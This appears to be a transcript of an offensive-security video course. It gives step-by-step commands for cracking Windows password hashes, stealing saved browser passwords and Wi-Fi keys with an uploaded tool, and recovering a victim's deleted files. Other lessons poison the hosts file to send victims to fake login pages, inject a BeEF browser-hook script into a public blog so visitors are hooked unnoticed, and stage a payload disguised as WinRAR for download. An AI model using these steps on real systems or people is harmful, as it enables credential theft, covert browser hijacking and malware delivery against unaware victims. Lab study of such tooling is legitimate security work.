directory. So first command is gonna be John, and I'm gonna add word list. I'm gonna type word list equal. Then I'm gonna put the full path of the word list, which is on my desktop, and it's called password.lst. And I'm gonna say minus format equal nt, which is the in triple format that uses to store the passwords and the integrity as a plain text. And now I'm gonna put the full path of the hash, which is on my desktop. So I'm gonna say root desktop and hash, and then now let me repeat the command. John is the name of the tool, then minus word list equal, then you are gonna put the full path of the password list, and minus format nt, which is the n triple format that used to storing and transmitting the passwords as a plain text. And lastly, you are gonna put the full path of the hash. Now I'm gonna say enter, and as you can see, the username, the IE user has the password test1234. So if you repeat this command, you will see that right now this password is not gonna be showing anymore because it's saved into your Kali Linux into a file called shadow password. But to list this or to see this password again, you can put John, then the format nt, and now we are gonna put the full path of your hash without using the word list because it's already cracked and stored into your shadow passwords. So hash, and for some reason it didn't show me, or yeah, I missed a command, which is minus show. So as you can see, the IE user test1234, here the password, and here the hash of the password. So yeah, I'm gonna say clear, and I'm gonna come back to my Windows machine. I'm gonna test the password, which is test1234. So I'm gonna say sign out. And now I'm gonna enter the password, which is test1234, and as you can see here, test1234, and now I'm gonna say enter. And as you can see, we were able to crack the administrator password, which is the IE user password. And this is by migrating our process with any system process, then using the command hash dump to get the password hashes, and then from the password hashes we can crack this hash using John the Reaper tool that comes already with Kali Linux. In this section, I'm going to show you how to gather the visited websites from the target browsers. That means that we will be able to see all the visited websites and all the downloaded files on his operating system. And then I'm going to show you how to steal the stored password from the target browsers. So if the target tried to log into his email or Facebook account and he enabled the remember me option, his password will be stored in the browser and will be able to steal that password. So first we are going to gather the visited websites from the target browser, and this is by using a Metasploit module. Then I'm going to steal the stored password on his computer by uploading a small program allows us to steal all the stored password from all the installed browsers. Now let's see how to do that. Okay, so here we have one interpreter session is open, and in order to run the module we are going to type use post windows gather for runsec, then browser history. Then I'm going to press enter. If I type two options, that you will see that you have only one option, which is the session. So what this module does, as I said in the introduction, that it's gonna steal it's gonna steal all the visited URLs, and also you will see all the downloaded files from any website. So this module does work against Google Chrome, Firefox, Opera, and almost all the browsers. So I'm gonna type run. Now it's gonna check the user profiles, and you can see here that the target has Google Chrome and Firefox, and it's downloading all the record on your Kali machine so that you can browse it anytime. So here we have one file from Google Chrome. It's in root.ms4 local IE use it, and also we have another folder or another file. Here is it. So I'm going to my files here in root, then I'm going to .msf4, then I'm going to local, and you can see here that I have two databases. One database is for Google Chrome and the second one is for Firefox. Let me drag it and drop it on my desktop. I'm going to close this window. Let me minimize this. And in order to see all the visited websites, I'm going to use a program which is pre-installed on Kali Linux called SQLite database. So you are going to get this interface, and I'm going to say open database, then I'm going to my desktop, and you will see here SQLite database files. I'm going to select it as all files, and I'm going to start with Google Chrome. So you are going to get all of these. What is interesting here is by going to browse data, and you will see the downloads. Let me maximize the window a little bit. So if we maximize this field a little bit, you will see that the target has downloaded a file called payload.exe and payload1.exe, testbat, payload1, Firefox setup, stop.exe, and he has downloaded these files from these websites. So if you go here, you will see a field called site URL. So here we have the target has downloaded the payload from 10.02.15, and then he browsed google.de to download Firefox. As you can see, he browsed Google DE, then he went to mozilla.org website. And now I'm going to browse what the browser history in Firefox browser. So if I'm going to type open database, then I'm going to select it as all files. Then I'm going to say IE user Firefox, and I'm going to run it from here. And because it's a new browser, you're not going to see too much. So here is all the visited URLs. You can go to Mozilla host, and you can browse all of these tabs. So now I'm going to come back and show you how to steal the stored password that is in the browsers. So I'm going to minimize this, and I'm going to open my terminal again. And to do that, we're going to upload a small program called Lazane. So I'm going to interact with the target by typing session first, and it's number 1, so session number -i1. And now I'm going to download this file from the internet. You can download it from GitHub, and I'm going to put all the links in the descriptions. So I'm going to type Lazane GitHub. So So you're gonna type Lazane GitHub, then you're gonna select Windows, and after that you are going to, let me come back here. I'm gonna type Lazane Windows like this, and then you are going to releases, and you will scroll down and you're gonna download the zip file. So I'm gonna open this file from the downloads, and I'm gonna extract it here. Let me open it, and I'm gonna copy it and put it on my root directory. Here's it. I'm gonna copy the name as well. Then I'm going back to my MSF console. I'm gonna type upload, then the name of the file. But before we do that, I'm gonna type the pwd, and you'll see that it's gonna be uploaded to downloads folder. I'm gonna leave it there, or you can download it on or upload it to Windows directory in the target machine. So I'm gonna type upload, then I'm gonna put the name of the file, then enter. And now the file has been uploaded. So I'm gonna come back to the target machine, and you will see that if I go to the download folder, you will see that this file here. So in order to run this program, you should have the administrator privileges, which I show you from a previous lecture. So I'm gonna type shell, then I'm gonna type the name lazane.exe, which is the name of the file that we have uploaded. Then I'm gonna press enter, and now you will see an options. So you will see that it's gonna steal the chat, mails, or we have auth to run all the modules, or it's gonna steal a database, Windows, the Wi-Fi passwords, the system admin password, but it's gonna be encrypted, or the saved passwords from the browsers. But before we do that, I'm gonna come back to the target machine, and let me go to facebook.com and store the password in Firefox. So I'm going to facebook.com, then I'm gonna type my fake email and password, just for example sad@gmail.com, and the password 1234567 and I'm gonna press enter, and I'm gonna save the password. And of course, this is a false information. So I'm gonna come back here, and I'm gonna run all the modules by typing the name of the program. Then I'm gonna type all. So it's gonna be, where is it? Design. I'm gonna pass it. Then I'm gonna put the option all, and I'm gonna press enter, and now it's gonna steal all of the informations. And as you can see, we have found the Wi-Fi password here. It took some time, but it's okay. And also the administrative password, but it's encrypted. And we have other information. So here is the stored password in Google Chrome. So as I said, sad@gmail.com, and the password is 1234. And this happened in facebook.com. So we learned from this lecture how to steal the visited websites from the target browsers, and also how to steal all the stored password in the target machine. And this is by using a small program called Lazane and uploading it to the target machine and run it as administrator, and it will steal, as we saw right now, the Wi-Fi password, or all the stored password in the target machine. Now I'm going to show you how to recover the deleted files or folders from the target operating system. This is done by using a module that allows us to do that. So if the target tried to delete any important files or information from any partition, we'll be able to recover it. So what I'm going to do in this lecture, I'm going to plug my USB flash drive to the target operating system. Then I will format this USB flash drive just to make sure that it's empty. And after that, I will copy some files to my USB flash drive, and I will delete these files from my USB manually, and I'll try to recover these files using a Metasploit module. And keep in mind that you can only recover the file that has been deleted manually, and you cannot recover the file that has been deleted by formatting the flash drive or the partition. Okay, so the first module that we're going to use is called enum drives, and what this module does is it will list all the logical drives and all the physical drives. So in order to use this module, I'm going to type use post windows gather forensic, then lastly enum drive, then I'm going to press enter. If I type show option, I'm going to see all the available options, and you can see here that I have two options. The first option called max drives, which is the maximum physical drive number, and also we have the session, which is number 2, as you can see here. And as I said, this will list all the physical drive and all of the logical drives in the target machine. So I'm going to type run. And one thing I want to mention that we use this module just to determine from which drive we are going to recover the files from. So I'm going to type run, and what's interesting here is the logical drives. So here we have 3 drives. The C drive, which is the primary drive of his operating system, and also we have D and E. If we come back to the target machine just to check, you can see here that he has C and D and E. So what we're gonna do right now is we're gonna copy these important files to the flash drive. Just to give you an example, let's say that this is very important files. Okay, as you can see here is very important files, and we are gonna delete all of these, and also we're gonna as you can see the cycle is empty, so there is no files here. So I'm gonna come back to the attacker machine, and we will see how we can recover these files. So we can see here that the files that has been deleted from the target machine are in D drive, and the module that we're going to use called recover files, and I'm going to show you that right now. So I'm going to type use post windows gather forensic and lastly recovery files, and I'm going to press enter. Then I'm going to type show options, and it will list all the available options. So here we have the drive. So from which drive you want to recover files from, I'm going to select it as D, because we're going to recover the files from D, and the session is number 2. And I'm going to talk about this later, because this will help us to download the files that has been deleted from the target drive on our Kali Linux. So, but first I'm going to type run. And as you can see, here is the deleted files. And as you can see, it's finished, and here's all the deleted files. So you can check again, Firefox setup, wallpaper, skills development, and PDF file. I'm gonna show you that here it's in recovery files. Here's all the files that has been deleted from this flash drive. As you can see, now the flash drive is empty. Okay, so what I'm gonna do is I'm gonna download these files on my Kali Linux. The deleted files I'm gonna download on my Kali Linux, even if this file is deleted. So this is only for test. I'm gonna show you how we can download the deleted files on our Kali Linux. So nothing in my flash drive, and nothing in the recycle bin, and there is no files. So I'm gonna come back to the attacker machine, and we're gonna use this module, which I talked about. It's recovery files. So we used D is the drive you want to recover the files from, and we set the session, and now we're gonna set the files. So let's say, for example, I'm gonna download this PDF, or let me leave this. Yeah, let me take this. Let me say that I'm going to download this file, which is PDF URL guide.pdf on my Kali Linux, which is deleted from the target machine. So what I'm gonna do is I'm gonna say set files, then I'm gonna put the ID of the file that has been deleted. So I'm gonna paste it here, and then I'm gonna press enter, and if I press run, it will download on my Cal Linux in this directory. So let me check that. So .msf, and it's in loot. And you can see here's the PDF file that has been deleted from the target machine, and we were able to recover this file and download it on our Cal Linux. So another thing we can do is we can download multiple files on our Cal Linux, so we don't have to put the ID, then run, and then the second ID, then run. This is gonna take a long time. So I'm gonna type set files, and I'm gonna put multiple IDs. So let me say this one, copy, and then I'm gonna paste it here, then a comma, then I'm gonna take the second ID, then I'm gonna put it here as well, and then a comma. I'm gonna put this ID and put it here. Then I'm gonna download all of these files on my Cal Linux. So I'm gonna type run, and you will see that it will be able to download all the deleted files from the target machine on my Cal Linux. And as you can see here, we have the PDF file, the doc file, and here's the installation file, which is Firefox, and lastly this wallpaper. So we learned from this lecture how to recover the deleted files from the target machine, and this is by using two modules. So the first module, as we saw before, called enum drive, that will list all the logical drives and all the physical drives, and from this module we'll be able to determine from which drive we are going to recover the files from. And the second module called recover files or recovery files, that will help us to see all the deleted files from a certain logical drive, and then we will determine, or we will select the file that we are going to download it on our Cal Linux, and then we can run this module and we can download all the deleted files from the target machine on our Cal Linux. And keep in mind, as I said in the introduction, that you cannot recover the file that has been deleted by formatting the flash drive or by formatting the volume of the target machine. In this short lecture, I'm going to show you how to enumerate the USB flash drive's history from the target operating system. This helps you to discover the target USB flash drives and see all the pre-connected devices to his operating system. For example, we could see another device had connected to the target operating system, and that means that the target could have another device. And the same thing with the other devices. Okay, so now let's start. I'm going to open my MSF console interface, and you can see here that I have one multiplayer session is open. And in order to run this module, I'm going to type use, post, Windows, gather, and lastly USB history, and I'm going to press enter. If you type two options, you will not see too much option. You have only one option, which is the session, and it's number 1, as you can see here. I have one session, the ID is number 1. If you typed info, you will see the description or what this module does. And you can see here this module will enumerate USB drive history on a target host. So that means that you'll be able to see all the pre-connected devices or all the connected USB flash drives in the target machine, so that you can take an idea of all the connected smartphones or USB flash drives. So I'm gonna type run, and let's see the result. And we can see here that we have 2 USB flash drive has been connected to that device or to that machine. So here we have the SanDisk Cruiser Blade USB device, and we have another SanDisk Cruiser Blade USB device. So the idea from this lecture and from the previous few lectures is to get and collect as much as possible of information of the target machine. So we learned how to steal the Wi-Fi password, capture the keystrokes, also steal the Windows credential, and also steal the stored password, and recover files. And now we learned how to enumerate pre-connected USB flash drives, and all of that just to fully control and see all of his activity on his machine and collect as much as possible of information from his Windows operating system. In this video, I'm going to show you how to redirect the target from to any website. This done by modifying the host file of the target Windows. And the host file is an operating system file that maps host names to IP addresses. But keep in mind that you can only redirect the target to any website or to a fake page, malicious page, if he tried to browse a website that uses HTTP protocol. And also you can prevent him from browsing any HTTP website you want. Now let's see how to do that. Okay, so here we have one interpreter session is open. But before we get started, I'm gonna give you an example. So if you go to the Windows machine, and now we're gonna locate the host file. So if you go to files and then this PC, then C partition, Windows, then you're gonna search for System32. So you're gonna scroll down and it's gonna be here, System32, and there you're gonna search for drivers, as you can see here, and then etc. Then you will see the host files. If you double click on it, you're gonna open it using the notepad. I'm gonna say OK. And as I said in the introduction, that the host file used to maps the host name to IP addresses. So here you can see some rules. And now I'm gonna give you an example that I'm going to redirect a HTTP website to my Linux web server. So first I'm gonna add my Linux IP address, which is 10.0.2.15. Then I'm gonna press tab, and now I'm gonna add the website that I'm going to redirect the target from this website to my Linux IP address. So let's search for a HTTP website. Let's say, for example, HTTP website. We can see there is a lot of websites. So we have here a website called www.bvb.de. So as you can see, this is the website. So I'm going to copy the URL of this website, and then I'm going to put it in the host name or the host file. I'm going to remove the HTTP. Like this. So first we are going to add the IP address of your Linux or the target, so you can redirect him to facebook.com, to any website you want. And here, once he requests this website, he will be redirected to this website. So here you have to put an IP address, not a domain name. So I'm going to give you an example right now. So if I saved it, so let me say save. Then I'm gonna close it, and I'm gonna type here in a new tab www.bvb.de. Then I'm gonna press enter, and as you can see, it's redirected me to my Linux Apache server. Let's say, for example, that you are gonna redirect him to facebook.com. So it's gonna be from bvb.de to facebook.com. So let's open the host file again, and I'm gonna open it using Notepad, and I'm gonna change this IP address to Facebook IP address. So, but how I can get Facebook IP address? Just open the start menu and type cmd, then press enter. Then you're gonna type ping, then www.facebook.com, or the website that you want to get its IP address, and then press enter. And then you will see the IP address of Facebook. So I'm going to copy it right now, and instead of 10.0.2.15, I'm going to put the IP address of facebook.com. So from www.bvb.de, he will be redirected to facebook.com. So let's see. So let's close the browser, let's close the host file, let's reopen Google Chrome browser. So I'm gonna type www.bvb.de like this, and I'm gonna press enter, and now you'll see the target has been directed to facebook.com. Of course, you can redirect him to a malicious file or to a malicious page or to a fake page to enter his credentials. Then you can get his username and password. So another thing you can do is by blocking the website, the HTTP website. So you cannot block the HTTPS website, as I said in the introduction. So instead of redirecting the target to a certain IP address, you're gonna put your local IP address, which is 127.0.0.1, and so 127.0.0.1 is your local IP address. And once the target redirected to this IP address, he will not be able to browse this website. So let me say save and close the host file. I'm gonna close the browser again and give you an example. And I'm gonna do www.pvb.de. I think there is an issue. Let me delete let me open a new browser from here, because sometimes you have to clear the search history. So I'm gonna type www.pvb.de, and now let's see the result. So as you can see, the website is down because we have redirected him to our local IP address. And I'm gonna show you that if we clear the search history from Google Chrome, it's gonna work. So clear browser data, and now let's see. So I'm gonna close the browser and reopen it, and I'm gonna type again the website pvb.de, and let's see the result. And you can see here your connection was interrupted, so the website is blocked right now. Okay, so far we've seen how to redirect the target to any website in his machine, but this time we're going to use a Metasploit module that allows us to do that in Metasploit console. So the module called inject host, I'm going to type to use it called just type use post Windows, then you're going to type manage, and lastly inject host. If you type show options, you'll see only 3 options, and the first option called domain. So you're gonna redirect the target from the domain, so you're gonna set the domain here to the IP address, and you're gonna put the IP address here, just we have done before. And lastly the session. So let's take an example. There is a website called webs.com. Let me show it to you. It doesn't include a HTTPS protocol, and we are gonna redirect this the target from webs.com to our Linux IP address. Of course, you can put any website that doesn't use HTTPS protocol, and it's gonna work fine with you. So I'm gonna type set domain, then I'm gonna put the domain name of the website www.webs.com, and then I'm gonna set the IP address. I'm gonna redirect him from webs.com to my Linux IP address 215, and lastly the session, which is session number 1. If I type to option again, you will see these options. So we're gonna redirect the target from www.webs.com to our Linux IP address 10.0.215, and the session is number 1. Let's take an example and type run. So it's injected successfully, and now let's come back to our Windows machine. Let me open Google Chrome and type www.webs.com, and as you can see, we have redirected the target from webs.com to our Linux IP address. And one thing I want to mention, that you can redirect the target from HTTP website to HTTPS website as well. So you can redirect them to HTTPS protocol and HTTP protocol, but not from a HTTPS protocol. Or let me give you a simpler example. You cannot redirect the target from websites like facebook.com, google.com, or hotmail or gmail.com to a website that uses HTTPS or HTTP protocols. But you can redirect them from a website that uses HTTP protocol to a website that uses a HTTPS or HTTP protocol. Okay, so right now let's take another example. Let's say that I'm going to redirect the target from a website, let's say for example, let's type HTTP website just for example. There is a website called the useless website, the useless web. Here's it, the useless web. It does uses a HTTP protocol. So we're gonna take the domain name of this website and redirect him to his local IP address so that he cannot browse this website. I'm gonna type show options and I'm gonna set, instead of webs.com, the new domain name. So set domain to the domain name that we have copied, like this. And I'm gonna redirect him to the local IP address. So I'm gonna type set IP 127.00.1 and I'm gonna press enter. And I'm gonna type show options again, and you will see that we are gonna redirect him from this website to his local IP address so that he cannot browse this website. Let me type run and see what's gonna be happen. So if I come back here, I'm gonna open a new page and I'm gonna type www.theuselesswebsite.com, and for some reason it does work. I think because we have to delete the browser history. So clear browsing data. And now we're gonna try again. Let me close the browser and reopen it. And I'm gonna type www.theuselessweb.com. And you will see that you will not be able to reach this website because you are redirecting to your local IP address, which is 127.0.0.1. Okay, so now let's say that we're going to redirect him to a HTTPS protocol or to a HTTPS website. So I'm going to redirect him from a website called, let's take an example. I want a HTTP website. I'm gonna type HTTP website.com domain. I'm gonna redirect him this time to bvd.da because it's the easier one. So I'm gonna type show options again. I'm gonna set the domain to the domain name that we have copied. So we're gonna redirect him from www.bvb.de, and then I'm going to redirect him to Facebook IP address. So I'm gonna open new terminal and I'm gonna type ping www.facebook.com. And then I'm gonna get the IP address of facebook.com. So I'm gonna type set IP, then I'm gonna put the IP address of Facebook, and then I'm gonna press enter. And if I type show options, you will see that I'm gonna redirect him from bvb.de website to the IP address of facebook.com. And now let's type run and see what's gonna be happen. So it's injected successfully, and now let's see if I type www.bvb.de. As you can see, he has been redirected to facebook.com because we have modified the host file of his Windows operating system. So if you want to get back everything to normal, you are going to come back to the host file, which is located in C partition Windows System 32, and then drivers etc, and you double click on it, open it with Notepad, and we're going to delete all of these rules that we have added it from our Kali Linux machine, and you're gonna save it like this. So if I clear the browser history from here, you will see that everything will come back to normal. Let me close this tab as well. And now I'm going to close Google Chrome. I'm going to reopen it and type the use this web.com, and you'll see that it's going to work fine. And we have www.bvb.de, and you'll see it's going to work fine, and everything is going to work fine. So we learned from this lecture how to redirect the target from to any website, and this is by modifying the host file of his Windows operating system. So you can redirect him to any HTTP website or to any HTTPS website, or you can block the website by redirecting him to his local IP address. After learning how we can full access any Windows operating system using Metasploit framework, in this section we will learn another powerful tool called Beef. Beef is a penetration testing tool that focuses on the web browsers, and it will hook one or more web browsers and use them as beachheads for launching directed command modules and further attacks against the system from within the browser context. This is done by giving the target a URL integrated with a JavaScript code, and once the target goes to our URL, the JavaScript code will run automatically on the target browser, and the browser will be hooked with our Beef control panel. And then we can launch various modules in the target browser, such as capturing the screenshot or playing a certain sound, stealing the target accounts, or even having the full access over the target operating system. And if you faced any issue during practicing what you have learned, please post your question in Q&A section or send me a direct message and I'll be glad to respond. In this lecture, I'm going to show you how you can hook the target browser with Beef. This is done by injecting a JavaScript URL into your website source code. And if you don't have a website, you can simply create a Blogger or a WordPress website, and there is tons of tutorials on the internet shows you how to do that. So after creating a website, you will inject Beef hooking code into it, and once the target enters your website, Beef script will run automatically into the target browser, and the browser will be hooked with your Beef control panel. And then you can run any Beef module you want. And if you don't want to create a website, you can simply enable your Apache web server on your Kali Linux machine, and then you can create a simple HTML index, and you are going to make sure that the JavaScript URL that's given by Beef is into your HTML index. And after doing that, you are going to give your public IP address to your target, and once the target enters your IP address, the HTML index will run, and also the hook JavaScript code will run automatically as well, and then you can run any module with Beef. Okay, so the first thing I'm going to be doing is I'm going to enable my web server. So once the target enters my IP address, he will see my index file that I have created, but we will create it right now. But first we need to enable our web server. So service Apache 2 start. And now our Apache web server is enabled. Now I'm going to the full path of my Apache web server, which is located in cd var www.html. So I'm going to say cd to change my directory to var www.html. And now I am in my Apache web server directory. If I said ls, you'll see that there is no files and directories. So right now I'm going to create a simple HTML code that includes the hook code. So I'm going to say nano, and I'm going to call it index.html, and nano is a text editor, and I'm going to say enter, and now I'm going to start coding. So I'm going to create only a simple code. So I'm going to start with doctype, HTML doctype, and I'm going to close the element with /html, and now I'm going to add the title. But first we need to add the head, and I'm going to close also the head element. So I'm going to add the title right here. I'm going to say title, and I'm going to say, for example, this is test. So the title will be this is test, and I'm going to close the title. Okay, and now I'm going to add the body element that contains what is in the document. So I'm gonna say body, and let me close it with body, then we can type whatever we want. So I'm gonna type something here. I'm gonna say, for example, let me say p element. Let me add p element because it will add the paragraph or the text that we want to add it, and I'm gonna say it's work. So here we have started our HTML index by typing doctype HTML, and we have closed it with /HTML, and the head that will contain the title. So the title is this is test, and then you can add the body element, and it contains its work sentence. So I'm gonna say Ctrl O right now, Ctrl X, and for now we didn't include the hook script, and I'm going to test the my Apache server to see the page. So I'm going to add my local IP address, which is 127.0.0.1, and as you can see, the title is this is test, and the page contain its work. So right now I'm going to add or I'm going to include the hook code with my HTML script. So I'm going to start beef from here, and it will give me the hook code. As you can see, it starts with script. Here is it. Let me minimize the window, and let me come back to my HTML code. Let me minimize my browser as well. So I'm going to add my HTML code again, and I'm going to add in the body element. I'm gonna add the code. Here is it. And I'm instead of the IP address that's here, I'm going to add my local IP address, or not my local IP address, my internal IP address. You can see it from here by opening new terminal and type ifconfig. And here is your internal IP address, 192.168.0.150. So I'm going to copy it, and I'm going to come back here, and I'm going to paste it instead of the IP address. So here is the script, and here is the URL 192.168.0.150 through the port 3000, and the hook JavaScript code will run. So let me say Ctrl O and Ctrl X to exit, and now let me go to my beef control panel. So the username is beef and the password is beef as well, and I'm gonna say login, and you can see here is my offline targets or my old targets, and I have no online browsers. So now let's test our index to see whether it's going to hook or not, and I'm gonna add my IP address 192.168.0.150, and as you can see it's work. And let me come back to my beef control panel, and you will see here that our code runs successfully and we have no issue with beef. So if I clicked on it, you will see that it's hooked with this IP address, and you will see some information about the target. So it's using a GNOME shell integration, and it's Linux, it's English, through Mozilla Firefox browser, and a lot of other information such as the screen size, etc. And here we have the logs. It's only some logs about the used modules or the recent module that you have used. And here we have the modules, or the most important part in this control panel, which is the command that you can run. So as you can see, we have a lot of modules that we can run, etc. And we have here some tabs. We're not going to talk about it right now. Here is your network. So beef is hooked to the browser, and it's hooked to your local IP address, etc. So now we are going to test this hooking code into the Windows machine. So let me close it, and now our hook client will go. Let me refresh the page. So it will run automatically, but now let me test my page into the target machine. So let's assume that this is the targeted browser, and you told your target to enter your IP address. So he will add your IP address 192.168.0.150, and I'm gonna say enter, and now he's in our page. So let me come back here, and you will see that a new browser will be hooked. As you can see, it's a Windows, but here it's telling you that it's a Windows XP, but actually it's not, and the dimension and some information about the machine, and here we have the commands, etc. So now let me give you another method to hook the client, because actually this is a little bit suspicious. You cannot give the target your IP address and tell him go to my IP address, because this will be weird. And even if you give him a shorted link, also this will be suspicious. But as I told you in the introduction, that you can integrate the JavaScript hook code with your Blogger or with your website. So let me go to my Blogger, and there is tons of tutorials on the internet shows you how you can create a Blogger. You will go to theme. In my case, I'm using a Blogger, so I'm going to theme. Then I'm going to say edit HTML, and now I'm going to search for the body element. So I'm going to say body, as you can see, and I'm going to add the script before the body here. Let me paste it. It's my IP address. Let me come back and take the JavaScript code. Where is it? And I'm gonna paste it into my Blogger HTML page. So here I'm gonna add my IP address, my Calnix IP address, which is 192.168.0.150, and now everything is ready to go. And I'm gonna say save theme. So let me show you my blog. Here's it at www.securitypro.com. Let me copy the domain, and let me come back to the target machine and give him the URL, or let me go to it automatically, www.securitypro.com, and I'm gonna say enter. And as you can see, everything is normal. My website will run and everything looks fine, and he will not see anything suspicious, and the HTML code or the JavaScript code will run automatically, and he'll be hooked into our machine. So let me refresh the page here. As you can see, now I have a new browser. If you checked here in the domain, you can see it's hooked through my, as you can see, the hostname www.securitypro.com, and you can run any command you want. Here is all the modules. So in the next video, I'm going to show you how you can take a screenshot of the target browser. This will be very easy by using a module that comes with Beef project. And we're going to talk about another module that you can use with Beef project on the hook line, such as capturing some keystrokes, or even redirecting the target, or even having the full access over the hooked browser. For now, this video only shows you how you can hook the target by creating a simple HTML page, or you can inject the HTML or JavaScript code given to us by Beef into your website, and you can give the URL of your website to your target, and once he enters your website, he'll be hooked automatically, and the code will run automatically, and he will not see anything suspicious, so everything is fine, and you can run any module you want. In the previous video, we've seen how we can hook our target with the Beef, and this is by creating a simple HTML code and including the hook JavaScript code into it, or we can inject the hook JavaScript code into our website, whether it's a Blogger or WordPress page, and then once the target enters our website, the code will run automatically, and the browser will be hooked with our Beef control panel. So here is my hooked target, and now I'm going to show you how we can play any sound you want in the target browser. So now let's take an example. I'm going to click on my target, and I'm going to the commands. I'm going to use a module called play sound, and it's here. I believe it's here, yeah. So browse, it's in browser field, and it's called play sound. So the sound that will be played called sound.wav, which is the extension of the sound. And here I'm gonna add my IP address or my Calnix IP address. So I'm gonna say 192.168.0.150, and now we will only play this sound into the target browser, and later I'm gonna show you how we can change this file or this sound to any sound you want. So now let's take an example. Here is our target. It's hooked with our website, and now I'm gonna run the sound. So I'm gonna say execute, and as you can see, this is the sound that has been played, and also you can play any sound you want in the target browser. So before we get into that, let me minimize the window and open new terminal, and then we will go to the full path of bev. So we will say cd, it's located in user share bevxx, and enter, and here is the full path of bev project. So if I type ls, you will see the configuration file and the module extension, etc. And in order to change this sound, we should change it from within bev, so from the configuration files in bev. Before we do that, I'm going to cd extensions, then I'm going to say ls, and I'm going to a folder called demo. Here is it, demos. So I'm going to say demos, cd demos, and now I'm going to say ls, and I'm going to say cd html, and also ls, and here is the sound that has been played in the target browser. So it's called sound.wav, and it's in user share bevxss, and extensions demos html, and yeah, you can change it from here. So you can open your browser. You can, for example, go to youtube.com, and you can download any sound you want. For example, let's say sound effect, and I'm gonna choose something. For example, here we have the bass drop sound effects. I'm gonna click on it and download it. I'm gonna open a new website that called, it's online video converter. Here is it, and then I'm gonna pass the URL of the video YouTube that we have selected. Here is it. I'm gonna copy it and paste it into this bar, and I'm gonna say the format is mp3. I'm gonna download it as mp3, and I'm gonna say start. Now we will download it. And now it's in my downloads directory. I'm going to rename it as test.mp3. This will be easier for us. And now I'm going to open new terminal from within downloads folder, and I'm going to say ls, and I'm going to copy the test.mp3 sound that we have downloaded to bev full path. So I'm going to say cp to copy test user share bevxx xss, and it's extensions and demos html, and enter, and now it's copied. So now let's check again. Let's say ls, and as you can see, our test.mp3 file is here. So now we need to change the configuration file of the module. So I'm gonna say cd // to come back 2 times or 3 times. I'm gonna say ls, and I'm going to cd modules ls. I'm going to cd browser because it's in browser, and again ls, and you can see here it's called sound play sound. I'm gonna say cd play sound, and enter, and ls, and you can see here the configuration file. So I'm going to open the config.yaml. So I'm gonna say nano, which is my text editor, or let me use the leaf pad, it's gonna be easier for us. Config.yam. Oh, not this one. I believe it's in the command.js. So leave pad command.js. It's also not here. So the last option is module.ruby. So leave pad module.rb, and here is it. So here you will see that our old sound called sound.wave, and it's located in demos as we saw before. And now we have another sound that's called test.mp3, and now everything is ready. So I'm gonna say Ctrl S to save it, and I'm gonna exit. So now we're ready to go. I'm going to open my browser. Here's my control panel. I'm gonna add my IP address, and instead of sound.wav, I'm gonna add the mp3 file that I have downloaded, which is test.mp3. And now let me say test, and we should hear sound from the target browser. So this is the sound. Let me play it again. Yeah, so this is the sound. You can also play any sound you want, even if the duration of the mp3 file was long, so 3, 4, 5 or 10 minutes, it's gonna be okay because I have tried this. And I'm gonna show another method to run any sound you want without changing the configuration file, etc, etc, etc. So this will be very easy. So let me say clear cd, and yeah. So after downloading the mp3 file, so here's it. You can just simply copy it or move it to your Apache web server. It's in var www html, and paste it here. So if you check your Apache web server, so cd var www html ls, and here is the new sound that we have downloaded. Here is it. Let me delete the others. Yeah, so here is it. It's test.mp3, and you can simply go to your Beef control panel, and instead of all of this, you can just put your IP address 192.168.0/test.mp3. So I think this is much easier than the previous method, so you don't have to modify the configuration file, and you don't have to copy the sound to Beef project folder. And yeah, so this is gonna be very easy. And I'm gonna say execute, and now let's hear the sound. So as you can see, this is the sound. So we learned in this video how you can play any sound you want in the target browser, and this is by downloading any sound you want from the internet, and then you can copy it to Beef directory and change the configuration file, or you can simply just copy it to your Apache web server and just change the URL to your IP address and slash then the name of the sound that you have copied, and you can execute, and it will work perfectly with you. Now I'm going to show you another module that you can use to take a screenshot of the target browser window. And to do that, just go to your Beef control panel and select your target, then go to commands, and I'm going to use a module that's called Spider Eye. So I'm going to click on the search bar, and I'm going to say spider, then I'm going to press enter, and as you can see, it's in browser and it's called Spider Eye. I'm going to click on it, and you can read the description is this module takes a picture of the victim's browser window. So as you can see now, my website is or my victim is hooked to my website. I'm gonna try to take a screenshot of the browser window, and to do that, just go and click on execute, and sometimes the module is not gonna work directly, so you have to run the module multiple times in order to take a screenshot. And the good thing in the module that you can take a full screenshot of the window, so you will be able to take a screenshot of all the window, as you can see, from up all the way down, etc. So I'm going to come back to my Kali Linux, and I'm going to try to execute the module. So I'm going to say execute, Then I'm gonna click on the command, then I'm gonna wait a little bit. And as you can see, it didn't work with me from the first time, so I'm gonna try to execute the command another time. So I'm gonna click on the module, then I'm gonna say execute, then I'm gonna click on command 2, and I'm gonna wait a little bit. And as you can see, we were able to take a screenshot of the target browser. Here is it, and you can see that it's not full. And to see the full image, just double or right click on the mouse, then say view image, and you will see the full image, as you can see. And because my website is an Arabic website, so Beef doesn't support it. It supports the English's websites, so it's not gonna show you the pictures and some of the Arabic sentence and words. It's not supported by Beef, etc. So we learned from this lecture how we can take a screenshot from the target browser window, and in the next lecture I'm going to show you how you can redirect the target to any website you want, so that you can redirect him to a fake page. It could be a malicious page, or it could be a fake page that asks the target to enter his credentials in order to steal his account. Now we are going to move to learn how we can redirect the target browser to any website you want. So you can redirect him to google.com, facebook.com, or any website you want. And also you can redirect him to a page that contains a malicious file, or you can redirect him to a fake page to enter his login credentials, for example. So you can do whatever you want. And to do that, we're going to use a module that's called redirect browser that comes with Beef. So I'm going to click on my hooked client. As you can see, it's hooked with my website, which is www.securitypro.com, as you can see here. So I'm going to click on my client, and then I'm going to say commands, and it's in browser, hooked domains, and it will be here. So as you can see, it's called redirect browser. So here it comes by default with that it's going to redirect the target to beef.com, and I'm gonna change it to google.com. So let's say, for example, https://www.google.com. And now let's test it. As you can see right now, the target is hooked with my website, and now we will redirect the target browser to google.com. So watch this. I'm gonna say execute, and I'm gonna come back here. And as you can see, we were able to redirect the target browser to google.com. So right here, I'm gonna accept the terms. Here is it. So I'm gonna come back to my website just to hack it again. So I'm gonna delete it right now. Okay, so now we are going to redirect the target to a page that contains a malicious file. So once we redirect the target to that page, our malicious file will be downloaded on the target machine, and then if he tried to open this file, he will be hacked. So my file is ready, and we learned how we can create a payload and how we can combine it with other exe files. So here it's in my downloads, and it's winride.exe, and you have to put it on your web server. So to do that, I'm going to open the terminal from within the downloads folder, and I'm going to say cp for copy and wr540.exe, which is the name of WinRAR, and I'm going to add the full path of my web server, which is located in var www.html, and I'm going to say enter. So let me check again. I'm going to say cd var www.html, and now I'm in my web server, and if I say ls, you can see that WinRAR program is on my web server. And now 